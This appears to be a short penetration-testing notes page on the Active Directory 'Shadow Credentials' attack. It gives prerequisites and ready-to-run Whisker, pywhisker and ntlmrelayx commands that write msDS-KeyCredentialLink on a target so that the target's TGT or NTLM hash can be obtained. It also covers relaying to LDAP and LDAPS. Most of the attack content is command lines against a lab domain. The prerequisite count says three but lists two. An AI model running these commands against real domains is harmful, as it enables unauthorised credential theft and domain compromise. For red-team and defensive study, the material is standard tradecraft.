Shadow Credentials
Before jumping into exploiting Shadow Credentials, I highly recommend reading the article from SpecterOps on shadow credentials.
Prerequisites
There are three prerequisites for this attack to be performed:
The ability to write to the
msDS-KeyCredentialLink
attribute on the target.A DC on the domain must be configured to support PKINIT.
Exploitation
After identifying a user account or machine account where the msDS-KeyCredentialLink
attribute can be written to, Whisker can be used to essentially automate the exploitation from a Windows machine:
# Generic usage of Whisker
Whisker.exe add /target:parzival
## https://github.com/ShutdownRepo/pywhisker
# Generic usage of PyWhisker
pywhisker.py -d $domain -u $user -p $password --target $target --action "list"x
Following running Whisker, it will provide a Rubeus command that can be executed in order to pull the targets TGT or NTLM hash.
Relaying
Ntlmrelayx also supports exploiting shadow credentials and can be used as follows:
# Relaying will work against either LDAP or LDAPS
# LDAPS
ntlmrelayx -t ldaps://parz-dc1 --shadow-credentials --shadow-target 'parz-dc2'
# LDAP
ntlmrelayx -t ldap://parz-dc1 --shadow-credentials --shadow-target 'parz-dc2'
## Failing to specify the --shadow-target will attempt to obtain a hash for the relayed user.
ntlmrelayx -t ldap://parz-dc1 --shadow-credentials
References
Last updated